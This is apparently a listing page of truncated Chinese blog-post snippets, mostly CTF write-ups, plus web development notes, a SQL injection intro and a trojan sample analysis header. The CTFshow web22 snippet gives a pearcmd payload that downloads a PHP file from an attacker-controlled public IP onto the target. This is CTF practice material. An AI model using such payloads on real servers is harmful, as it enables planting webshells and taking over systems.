bugku-web bugku web 26
Bugku-misc-猫片(安恒)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164131585-616802881.png) 根据提示LSB BGR 方式去获取图片中的隐藏信息 使用工具StegSolve ![images](h ......
Bugku-misc-重叠拼图
``` 其实这一题灵感是来自于b站一个puzzle up主的一个投稿,就叫重叠拼图,就是两块拼图之间有大量的重叠部分。我按照原理,参考了机气人师傅和狸师傅的代码,写了这个算法,把底图加flag后分成20x20像素的方块,然后每个方块找一个随机点作为圆心将图片旋转随机角度,然后以圆心为中心截取一个80 ......
Bugku-misc-ping
打开文件,选择不同发送包可以看到数据部分的前几位在变换,将这两位复制出来拼接即可得到flag。 ![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164216222-1919930907.gif) ......
Bugku-misc-telnet
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164231152-1480588316.png) 刚结束的ciscn,里面的要是有这么简单就好了。 下载附件,是个pcap文件,打开wireshark ......
Bugku-misc-所见非实
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164152979-1835671043.png) 这题是自己独立完成的!!! 首先下载附件!!! 解压缩发现是个docx文档,wps提示可以修复,但是 ......
Bugku-misc-1和0的故事
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164039300-1412985760.png) 下载下来的附件!打开都是1和0的组合! ![images](https://img2023.cnbl ......
Bugku-misc-啊哒
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164056803-2130767476.png) 有点意思的题目,看了一下评论区。 有了解题思路。 首先解压附件,可以得到一张照片。 ![images ......
Bugku-misc-虎符
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164115227-1312344456.png) 这个题目对于菜鸡来说真的有点难呐。。 总结一下: 左: 图片分离,可以看到图片里有rar文件; hi ......
Bugku-冬至红包
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829163925391-1381089065.png) 这个题目的考察的还是代码审计,还有eval函数的利用,当然还有对过滤这些因素的审查。 代码块就直接放 ......
Bugku-社工-伪造
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829163942166-1131072430.png) 真社工... ![images](https://img2023.cnblogs.com/blog/ ......
CTFshow 萌新web22
* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload: http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php: `"; ?>` 上传成功后显示: ``` do ......
web UnderTow容器常用参数
具体默认值查看io.undertow.Builder 需要个性化配置参考下方配置 server: undertow: # 以下的配置会影响buffer,这些buffer会用于服务器连接的IO操作 # 如果每次需要 ByteBuffer 的时候都去申请,对于堆内存的 ByteBuffer 需要走 JV ......
Web编辑器 从word中复制内容带多张图片
如何做到 ueditor批量上传word图片? 1、前端引用代码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ......
Web自动化
##第1章-Web自动化入门 ###Web自动化测试 ####1、自动化 - 概念:由机器设备代替人工自动完成指定目标的过程 - 优点:减少人工劳动力;提高工作效率;产品规格统一标准;规模化(批量生产) ####2、自动化测试 软件测试:校验系统是否满足规定的需求、弄清预期结果与实际结果之间的差别 ......
NSSCTF 2nd-WEB部分writeup
# 所以王原的代价是? writewp ![](https://img2023.cnblogs.com/blog/3181170/202308/3181170-20230828154508828-1077733855.png) ## WEB (遗憾,差点AKweb,最后一个真的做不了一点,还是太菜了 ......
木马样本分析: 99b02a32a9d92c521de94a53dcd93078a357d0e2f26fdeb57735a53fee9b60fa,一个.net SmartAssembly混淆的样本
csharp的类: using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms; // Token: 0x02000009 RID: 9 public sealed class ......
2023.8.26
文章并不完整,仅为个人学习,如有需要请看这篇[https://byxs20.github.io/posts/5890.html#hacked-4](https://byxs20.github.io/posts/5890.html#hacked-4) # hard_web ## hard_web_1 ......
Galaxy Studio星河工作室于8月26日正式使用Canva可画网页版对室徽进行重绘!还开放了名片模板?
Galaxy Studio星河工作室于8月26日正式使用Canva可画网页版对室徽进行重绘!还开放了名片模板? 据了解,Galaxy Studio星河工作室室长于8月26日对使用Canva可画网页版室徽正式重绘!新室徽到底怎么样呢?让大家都来看看吧! 怎么样?不错吧! 对了!还有一个名片模板,想要使 ......
Windows服务作为Web API的服务端
将Windows服务作为Web API的服务端,需要实现一个Web API控制器,并将其集成到Windows服务中。以下是一些基本步骤: 在您的Windows服务项目中创建一个新的Web API控制器。您可以使用Visual Studio的类库模板来创建一个空的Web API项目,然后将控制器添加到 ......
Web通用漏洞--sql注入
# SQL注入 mysql注入目的:获取当前web权限 ## mysql注入--常规查询&union联合查询 1. MYSQL--Web组成架构 服务器搭建web服务可能存在多个站点搭建在一台服务器中,数据集中存储在数据库中,因此对数据库的管理也可以分为两种架构: 统一用户管理数据库,即对所有站点数 ......
idea 2021创建java web项目
## 1 创建普通Java项目 ![image](https://img2023.cnblogs.com/blog/3035125/202308/3035125-20230828155646567-1298078210.png) ## 2 添加框架 #### 2.1 添加框架 ![image](ht ......
南墙WAF-最好的免费Web应用防火墙
免费的web应用防火墙最出名的非ModSecurity莫属。ModSecurity一度以维护者众多,规则更新较积极,并且免费而受安全圈追捧,然而随着时代变迁,ModSecurity的多种致命缺陷也逐渐暴露,包括: 缺乏管理后台,使用起来极为不便。 安全规则过于粗糙,很容易产生误报,从而影响正常业务。 ......
electron如何与web对接
mian.js //创建主窗体 function createWindow(options) { // Create the browser window. mainWindow = new BrowserWindow({ modal: true, fullscreen: false, autoHi ......
【2023-08-26】连岳摘抄
23:59 任何事情,急于求成都是幼稚的幻想,急于求成的结果一定是不成,对此不应该有任何怀疑。 ——王蒙 统计,去年北京、上海、广州、深圳,四个一线城市的人口都减少了。这可能预示着城市化达到了一个新的平衡点,一线城市给人带来的收益与损失相当。当一线人口饱和时,你原本想象的“出人头地”,其实更难了。女 ......
5个前端开源项目带你在Web上体验Windows
本文来分享五个 yyds 的开源项目,这些项目把 Windows 带到了 Web 平台上。让我们一起感受这些项目带来的回忆和创新,重温 Windows 93、98、XP 和 7 的经典界面,甚至探索现代概念中的 Windows 11 和 12! Windows 12 使用 JavaScript、CS ......
vs的web调试以127.0.0.1启动
VS以127.0.0.1 调试步骤_SuperMan25的博客-CSDN博客 默认以localhost启动,无法接收127.0.0.1 1.管理员启动vs 2.邮件单击项目-》属性 更改项目启动路径为127.0.0.1 3.打开项目所在文件 找到这个config 4.更改其对应端口启动地址 为127 ......
剑指Offer 26. 树的子结构
**题目链接:** [剑指Offer 26. 树的子结构](https://leetcode.cn/problems/shu-de-zi-jie-gou-lcof/description/?envType=study-plan-v2&envId=coding-interviews) **题目描述:* ......
8.26 后记
![img](https://img2023.cnblogs.com/blog/3213829/202308/3213829-20230827161222973-186149494.png) ![img](https://img2023.cnblogs.com/blog/3213829/202308 ......
【web_逆向13】ob混淆及实战
## 什么是ob混淆? - OB 混淆和变量名混淆是常用的代码混淆技术。 - OB 混淆是指在代码中添加一些无用的代码和函数,以增加代码的复杂度和难以理解性,从而增加代码的保护性。 - 变量名混淆是指将变量名替换为无意义的字符串,增加代码的难度和防止代码的逆向分析。 ## ob混淆的特点 - 它会把 ......